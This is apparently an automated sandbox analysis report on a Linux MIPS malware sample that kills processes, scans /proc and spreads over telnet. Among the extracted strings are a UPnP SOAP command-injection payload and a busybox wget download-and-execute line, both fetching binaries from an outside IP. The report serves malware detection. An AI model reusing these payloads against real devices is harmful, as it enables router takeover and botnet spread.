/cgi-bin/ViewLog.asp</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:31:14 GMTServer: Apache/2.4.43 (Win64)Content-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 04 Jan 1970 10:35:04 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>

Source: E6l0C6FObI.elf	String found in binary or memory: http://141.98.10.72/bins/x86
Source: E6l0C6FObI.elf	String found in binary or memory: http://141.98.10.72/zyxel.sh;
Source: E6l0C6FObI.elf	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: E6l0C6FObI.elf	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

System Summary

Sample tries to kill multiple processes (SIGKILL)

Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 723, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 764, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 793, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 804, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 850, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 888, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 933, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 1431, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 1432, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 3047, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 3273, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 3275, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 3278, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 3368, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 3394, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 3456, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 3461, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 3465, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 3469, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 3475, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 5833, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5843)	SIGKILL sent: pid: 723, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5843)	SIGKILL sent: pid: 764, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5843)	SIGKILL sent: pid: 793, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5843)	SIGKILL sent: pid: 804, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5843)	SIGKILL sent: pid: 850, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5843)	SIGKILL sent: pid: 888, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5843)	SIGKILL sent: pid: 933, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5843)	SIGKILL sent: pid: 1431, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5843)	SIGKILL sent: pid: 1432, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5843)	SIGKILL sent: pid: 3044, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5843)	SIGKILL sent: pid: 3047, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5843)	SIGKILL sent: pid: 5830, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5843)	SIGKILL sent: pid: 5836, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5843)	SIGKILL sent: pid: 5837, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5843)	SIGKILL sent: pid: 5841, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5843)	SIGKILL sent: pid: 5847, result: successful	Jump to behavior

Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.72 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Source: ELF static info symbol of initial sample

.symtab present: no

Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 723, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 764, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 793, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 804, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 850, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 888, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 933, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 1431, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 1432, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 3047, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 3273, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 3275, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 3278, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 3368, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 3394, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 3456, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 3461, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 3465, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 3469, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 3475, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	SIGKILL sent: pid: 5833, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5843)	SIGKILL sent: pid: 723, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5843)	SIGKILL sent: pid: 764, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5843)	SIGKILL sent: pid: 793, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5843)	SIGKILL sent: pid: 804, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5843)	SIGKILL sent: pid: 850, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5843)	SIGKILL sent: pid: 888, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5843)	SIGKILL sent: pid: 933, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5843)	SIGKILL sent: pid: 1431, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5843)	SIGKILL sent: pid: 1432, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5843)	SIGKILL sent: pid: 3044, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5843)	SIGKILL sent: pid: 3047, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5843)	SIGKILL sent: pid: 5830, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5843)	SIGKILL sent: pid: 5836, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5843)	SIGKILL sent: pid: 5837, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5843)	SIGKILL sent: pid: 5841, result: successful	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5843)	SIGKILL sent: pid: 5847, result: successful	Jump to behavior

Source: classification engine

Classification label: mal92.spre.troj.linELF@0/0@2/0

Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/1185/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3241/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3483/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/1732/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/1730/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/1333/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/1695/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3235/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3234/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/911/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/515/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/5776/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/914/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/1617/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/5812/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/5813/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/1615/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/917/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/5673/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3255/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3253/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/1591/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3252/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3251/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3250/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/1623/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/1588/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3249/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/764/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3368/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/1585/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3246/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3488/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/766/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/800/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/888/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/802/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/1509/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/803/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/804/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3800/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3801/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/1867/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3802/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/1484/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/490/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/1514/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/1634/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/1479/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/1875/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/654/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3379/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/655/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/656/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/777/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/931/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/1595/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/657/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/812/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/779/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/658/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/933/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/418/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/5833/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/419/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3419/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3310/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3275/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3274/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3273/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3394/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3272/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/782/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3303/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/1762/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3027/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/1486/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/789/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/1806/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3700/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/1660/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3440/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/793/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/794/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3316/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/674/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/796/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/675/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/676/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/1498/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/1497/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/1496/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3157/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3278/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3399/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3799/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/1659/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3332/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3210/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3298/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3052/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/680/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/681/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/3292/exe	Jump to behavior
Source: /tmp/E6l0C6FObI.elf (PID: 5830)	File opened: /proc/1701/exe	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 43690
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 43708
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 43710
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 43714
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 43722
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 43726
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 43732
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 43736
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 43740
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 43758
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51112
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51244
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51256
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51278
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51232
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51284
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51414
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51418
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51350
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51466
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51418
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51490
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51534
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51484
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51596
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51626
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51650
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51716
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51740
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51748
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51770
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 58168
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 58204
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 58220
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 58236
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 58240
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 58256
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 58302
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 58312
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 58312
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 58330
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 58384

Source: /tmp/E6l0C6FObI.elf (PID: 5827)

Queries kernel information via 'uname':

Jump to behavior

Source: E6l0C6FObI.elf, 5827.1.00007ffff577f000.00007ffff57a0000.rw-.sdmp, E6l0C6FObI.elf, 5830.1.00007ffff577f000.00007ffff57a0000.rw-.sdmp, E6l0C6FObI.elf, 5832.1.00007ffff577f000.00007ffff57a0000.rw-.sdmp, E6l0C6FObI.elf, 5833.1.00007ffff577f000.00007ffff57a0000.rw-.sdmp, E6l0C6FObI.elf, 5836.1.00007ffff577f000.00007ffff57a0000.rw-.sdmp, E6l0C6FObI.elf, 5837.1.00007ffff577f000.00007ffff57a0000.rw-.sdmp, E6l0C6FObI.elf, 5841.1.00007ffff577f000.00007ffff57a0000.rw-.sdmp, E6l0C6FObI.elf, 5845.1.00007ffff577f000.00007ffff57a0000.rw-.sdmp, E6l0C6FObI.elf, 5847.1.00007ffff577f000.00007ffff57a0000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/E6l0C6FObI.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/E6l0C6FObI.elf
Source: E6l0C6FObI.elf, 5830.1.000055845f381000.000055845f3a2000.rw-.sdmp	Binary or memory string: Uu-binfmt/mipsel/usr/bin/qemu-mipsel
Source: E6l0C6FObI.elf, 5827.1.000055845f2fa000.000055845f381000.rw-.sdmp, E6l0C6FObI.elf, 5830.1.000055845f2fa000.000055845f381000.rw-.sdmp, E6l0C6FObI.elf, 5832.1.000055845f2fa000.000055845f381000.rw-.sdmp, E6l0C6FObI.elf, 5833.1.000055845f2fa000.000055845f381000.rw-.sdmp, E6l0C6FObI.elf, 5836.1.000055845f2fa000.000055845f381000.rw-.sdmp, E6l0C6FObI.elf, 5837.1.000055845f2fa000.000055845f381000.rw-.sdmp, E6l0C6FObI.elf, 5841.1.000055845f2fa000.000055845f381000.rw-.sdmp, E6l0C6FObI.elf, 5845.1.000055845f2fa000.000055845f381000.rw-.sdmp, E6l0C6FObI.elf, 5847.1.000055845f2fa000.000055845f381000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mipsel
Source: E6l0C6FObI.elf, 5830.1.000055845f2fa000.000055845f381000.rw-.sdmp	Binary or memory string: U!/usr/bin/qemu-mipsel!AlgorithmIdentifier
Source: E6l0C6FObI.elf, 5830.1.000055845f2fa000.000055845f381000.rw-.sdmp	Binary or memory string: /usr/bin/vmtoolsd
